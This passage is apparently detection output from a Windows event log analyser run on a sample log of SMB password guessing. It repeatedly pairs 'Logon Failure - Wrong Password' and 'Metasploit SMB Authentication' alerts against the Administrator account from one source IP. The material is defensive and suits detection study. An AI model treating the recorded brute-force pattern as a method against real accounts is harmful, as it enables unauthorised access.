Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 